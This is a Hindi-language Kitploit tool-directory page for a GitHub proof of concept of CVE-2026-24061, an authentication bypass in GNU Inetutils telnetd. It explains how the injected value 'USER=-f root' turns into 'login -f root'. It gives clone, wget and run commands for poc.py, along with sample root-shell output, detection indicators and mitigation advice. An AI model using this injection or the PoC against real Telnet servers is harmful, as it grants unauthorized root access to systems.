Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

CVE-2026-24061 GNU Inetutils Telnetd प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
6घं 6मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061
GNU Inetutils Telnetd प्रमाणीकरण बाईपास

CVE: CVE-2026-24061
गंभीरता: क्रिटिकल
CVSS: 9.8 (क्रिटिकल)
CWE: CWE-88 — कमांड में आर्गुमेंट डिलीमीटर का अनुचित न्यूट्रलाइज़ेशन
प्रभावित घटक: GNU Inetutils telnetd
प्रभावित संस्करण: 1.9.3 से 2.7

अवलोकन

CVE-2026-24061 GNU Inetutils द्वारा प्रदान किए गए Telnet सर्वर कार्यान्वयन में एक क्रिटिकल प्रमाणीकरण बाईपास भेद्यता है। यह भेद्यता Telnet स्वचालित लॉगिन सक्षम होने पर क्लाइंट-नियंत्रित USER पर्यावरण चर के अपर्याप्त सत्यापन से उत्पन्न होती है। एक दुर्भावनापूर्ण मान को उपयोगकर्ता नाम के बजाय सिस्टम लॉगिन प्रोग्राम के विकल्प के रूप में व्याख्यायित किया जा सकता है। कमजोर कॉन्फ़िगरेशन के तहत, एक अनधिकृत दूरस्थ हमलावर login को -f विकल्प के साथ आमंत्रित करने और प्रमाणीकरण को बाईपास करने के लिए इस व्यवहार का दुरुपयोग कर सकता है, संभावित रूप से अनुरोधित खाते के विशेषाधिकारों के साथ एक शेल प्राप्त कर सकता है।

जब प्रभावित Telnet सेवा रूट विशेषाधिकारों के साथ चल रही हो, तो सफल शोषण के परिणामस्वरूप अनधिकृत दूरस्थ रूट एक्सेस हो सकता है।

तकनीकी विवरण

कमजोर निष्पादन प्रवाह को इस प्रकार संक्षेपित किया जा सकता है:

root@kitploit:~
 Telnet क्लाइंट
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ लॉगिन आर्गुमेंट बनाता है
      ▼
 login -f root
      │
      │ प्रमाणीकरण बाईपास
      ▼
 रूट शेल

यह समस्या Telnet की स्वचालित लॉगिन कार्यक्षमता और USER पर्यावरण चर के हैंडलिंग के बीच परस्पर क्रिया के माध्यम से ट्रिगर होती है।

हमलावर-नियंत्रित मान:

root@kitploit:~
 -f root

को सख्ती से उपयोगकर्ता नाम के रूप में नहीं माना जाता है। इसके बजाय, यह login का आर्गुमेंट बन सकता है, जिसके परिणामस्वरूप इसके बराबर व्यवहार होता है:

root@kitploit:~
 login -f root

-f विकल्प login को निर्दिष्ट उपयोगकर्ता के लिए सामान्य प्रमाणीकरण प्रक्रिया को बाईपास करने का निर्देश देता है।

प्रूफ ऑफ कॉन्सेप्ट PoC

रिपॉजिटरी में एक Python 3 प्रूफ ऑफ कॉन्सेप्ट शामिल है जो Telnet कनेक्शन करता है, आवश्यक प्रोटोकॉल नेगोशिएशन को संभालता है, दुर्भावनापूर्ण USER मान इंजेक्ट करता है, और परिणामी सत्र को सत्यापित करता है।

रिपॉजिटरी क्लोन करें (अनुशंसित)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <TARGET> <PORT>

केवल poc.py डाउनलोड करें

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

उपयोग

PoC को निष्पादन योग्य बनाएं:

root@kitploit:~
 chmod +x poc.py

लक्ष्य पता और Telnet पोर्ट प्रदान करके इसे चलाएं:

root@kitploit:~
 python3 poc.py <TARGET> <PORT>

उदाहरण:

root@kitploit:~
 python3 poc.py 127.0.0.1 23

सफल शोषण

एक कमजोर लक्ष्य निम्नलिखित के समान आउटपुट उत्पन्न करता है:

CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass

root@kitploit:~
 [*] लक्ष्य: 127.0.0.1:23
 [+] कनेक्टेड
 [*] USER=-f root इंजेक्ट किया गया
 
 [+] VULNERABLE

फिर PoC एक इंटरैक्टिव सत्र प्रदान करता है।

विशेषाधिकार वृद्धि की पुष्टि इसके साथ की जा सकती है:

root@kitploit:~
 id

अपेक्षित परिणाम:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

यह पुष्टि करता है कि Telnet प्रमाणीकरण तंत्र को बाईपास कर दिया गया था और परिणामी सत्र में रूट विशेषाधिकार हैं।

PoC कार्यप्रवाह

शोषण निम्नलिखित कार्य करता है:

लक्ष्य Telnet सेवा से कनेक्ट होता है। आवश्यक Telnet प्रोटोकॉल नेगोशिएशन करता है। शोषण के लिए आवश्यक स्वचालित-लॉगिन व्यवहार सक्षम करता है। दुर्भावनापूर्ण USER=-f root मान प्रदान करता है। कमजोर telnetd कार्यान्वयन को हेरफेर किए गए मान को login तक पहुंचाने की अनुमति देता है। परिणामी सत्र प्राप्त करता है। ऑपरेटर को एक इंटरैक्टिव टर्मिनल प्रदान करता है।

PoC कमजोर प्रमाणीकरण पथ के लिए क्रेडेंशियल पर निर्भर नहीं करता है।

प्रभावित कॉन्फ़िगरेशन

शोषण लक्ष्य कॉन्फ़िगरेशन और telnetd तथा सिस्टम के लॉगिन कार्यान्वयन के बीच परस्पर क्रिया पर निर्भर है।

प्राथमिक शर्तें हैं:

प्रभावित संस्करण सीमा के भीतर GNU Inetutils telnetd।
हमलावर के लिए सुलभ Telnet सेवा।
स्वचालित लॉगिन कार्यक्षमता सक्षम या उपलब्ध।
USER पर्यावरण चर की कमजोर हैंडलिंग।
इंजेक्ट किए गए विकल्प की व्याख्या करने में सक्षम एक संगत लॉगिन कार्यान्वयन।

नतीजतन, अकेले प्रभावित Inetutils संस्करण की उपस्थिति को शोषण क्षमता के प्रमाण के रूप में नहीं माना जाना चाहिए। वितरण पैच और सेवा कॉन्फ़िगरेशन पर भी विचार किया जाना चाहिए।

प्रभाव

CVE-2026-24061 एक कमजोर सिस्टम को पूरी तरह से समझौता कर सकता है।

telnetd जिन विशेषाधिकारों के तहत संचालित होता है, उसके आधार पर शोषण प्रदान कर सकता है:

प्रमाणीकरण बाईपास
अनधिकृत स्थानीय खाता एक्सेस
दूरस्थ कमांड निष्पादन
विशेषाधिकार वृद्धि
रूट-स्तरीय एक्सेस
पूर्ण सिस्टम समझौता

सबसे अधिक जोखिम वाला परिदृश्य एक दूरस्थ रूप से सुलभ Telnet सेवा है जहां शोषण के परिणामस्वरूप रूट सत्र होता है।

पहचान

शोषण के संभावित संकेतकों में शामिल हैं:

TCP/23 पर अप्रत्याशित कनेक्शन।
असामान्य उपयोगकर्ता नामों का उपयोग करके Telnet प्रमाणीकरण प्रयास।
कमांड-लाइन विकल्पों से शुरू होने वाले संदिग्ध USER मान।
अप्रत्याशित लॉगिन प्रक्रिया आर्गुमेंट।
telnetd से उत्पन्न रूट सत्र।
Telnet सेवा द्वारा उत्पन्न अप्रत्याशित प्रक्रियाएं।

नेटवर्क निगरानी को अनावश्यक रूप से Telnet सेवाओं को उजागर करने वाले सिस्टम की भी पहचान करनी चाहिए।

शमन

अनुशंसित प्रतिक्रिया Telnet को हटाना और दूरस्थ प्रशासन के लिए SSH का उपयोग करना है।

यदि Telnet को तुरंत नहीं हटाया जा सकता है:

सुरक्षा फिक्स युक्त विक्रेता-प्रदत्त संस्करण में अपग्रेड करें।
उपयुक्त ऑपरेटिंग-सिस्टम सुरक्षा अपडेट लागू करें।
TCP/23 को विश्वसनीय प्रबंधन नेटवर्क तक सीमित करें।
Telnet को अविश्वसनीय नेटवर्क के सीधे संपर्क से रोकें।
Telnet प्रमाणीकरण और प्रक्रिया गतिविधि की निगरानी करें।

क्योंकि Linux वितरण अपस्ट्रीम संस्करण संख्या बदले बिना सुरक्षा फिक्स बैकपोर्ट कर सकते हैं, प्रशासकों को केवल प्रदर्शित संस्करण पर भरोसा करने के बजाय अपने वितरण पैकेज की सुरक्षा स्थिति को सत्यापित करना चाहिए।

सत्यापन

भेद्यता को Ubuntu 22.04.5 LTS पर चल रही एक कमजोर GNU Inetutils Telnet सेवा के विरुद्ध सफलतापूर्वक पुनरुत्पादित किया गया था।

PoC ने TCP/23 पर एक कनेक्शन स्थापित किया, इंजेक्ट किया:

root@kitploit:~
 USER=-f root

और एक रूट सत्र प्राप्त किया।

विशेषाधिकार सत्यापन ने लौटाया:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

यह सुरक्षा प्रभाव की प्रत्यक्ष पुष्टि प्रदान करता है।

अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट सुरक्षा अनुसंधान, भेद्यता सत्यापन, अधिकृत पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

केवल उन सिस्टम का परीक्षण करें जिनके लिए आपके पास स्पष्ट प्राधिकरण है।

Gabriel D. Ishengoma
आक्रामक सुरक्षा · साइबर सुरक्षा अनुसंधान · डिजिटल फोरेंसिक

टूल डाउनलोड करें